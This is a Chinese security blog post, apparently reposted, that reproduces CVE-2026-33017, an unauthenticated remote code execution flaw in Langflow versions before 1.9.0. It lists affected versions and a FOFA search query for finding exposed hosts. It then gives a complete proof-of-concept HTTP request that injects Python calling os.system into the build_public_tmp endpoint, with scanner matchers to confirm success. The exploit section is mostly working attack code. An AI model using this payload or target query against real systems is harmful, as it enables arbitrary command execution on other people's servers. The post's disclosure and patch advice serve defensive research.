Langflow远程代码执行漏洞(CVE-2026-33017)复现

admin
admin
admin
0
文章
0
评论
2026-03-27 03:06:18 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文档复现了Langflow1.9.0之前版本的远程代码执行漏洞CVE-2026-33017。该漏洞源于/api/v1/build_public_tmp端点未对传入的流程数据进行校验便传递给exec函数,允许未认证攻击者执行任意代码。文章提供了详细的漏洞描述、影响版本、FOFA测绘语法及完整的POC利用代码,并验证了漏洞有效性。建议受影响用户立即升级版本以修复安全风险。 综合评分: 82 文章分类: 漏洞分析,漏洞POC,渗透测试

cover_image

Langflow 远程代码执行漏洞(CVE-2026-33017) 复现

老谢 老谢

H4ll0 H4ck3r

2026年3月24日 20:39 广东

声明: 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,H4ll0 H4ck3r及文章作者不为此承担任何责任。H4ll0 H4ck3r拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经H4ll0 H4ck3r允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

漏洞描述

Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。Langflow 1.9.0之前版本存在安全漏洞,该漏洞源于/api/v1/build_public_tmp/{flow_id}/flow端点接受攻击者控制的流程数据并传递给exec函数,可能导致未经验证的远程代码执行。

影响版本

Langflow 1.9.0之前版本

空间测绘

fofa:icon_hash="1727196746"

POC

#$ payload = ifconfig | ipconfigPOST /api/v1/build_public_tmp/0c8c94cb-dcbb-4343-904e-c62ea6158d40/flow HTTP/1.1Host: {{Hostname}}User-Agent: {{random_ua}}Cookie: client_id=veilContent-Type: application/json{"data": {"nodes": [{"id": "Test", "type": "genericNode", "position": {"x": 0, "y": 0}, "data": {"id": "Test", "type": "Test", "node": {"template": {"code": {"type": "code", "required": true, "show": true, "multiline": true, "value": "import os, socket, json as _json\n\n_command = os.system(\"{{payload}}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n  display_name=\"X\"\n  outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n  def r(self)->Data:\n    return Data(data={})", "name": "code", "password": false, "advanced": false, "dynamic": false}}, "_type": "Component"}, "description": "X", "base_classes": ["Data"], "display_name": "Test", "name": "Test", "frozen": false, "outputs": [{"types": ["Data"], "selected": "Data", "name": "o", "display_name": "O", "method": "r", "value": "__UNDEFINED__", "cache": true, "allows_loop": false, "tool_mode": false, "hidden": null, "required_inputs": null, "group_outputs": false}], "field_order": ["code"], "beta": false, "edited": false}}], "edges": []}, "inputs": null}
#@ stop_scan: true#@ condition: and#@ matcher: header["content-type"] contains "json"#@ matcher: body matches /inet \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/ || (body contains "Windows IP" && body contains "子网掩码" && body contains "eth0" && body contains "eth1")#@ matcher: status_code == 200

漏洞扫描

漏洞确认

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:H4ll0 H4ck3r 老谢 老谢《Langflow 远程代码执行漏洞(CVE-2026-33017) 复现》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0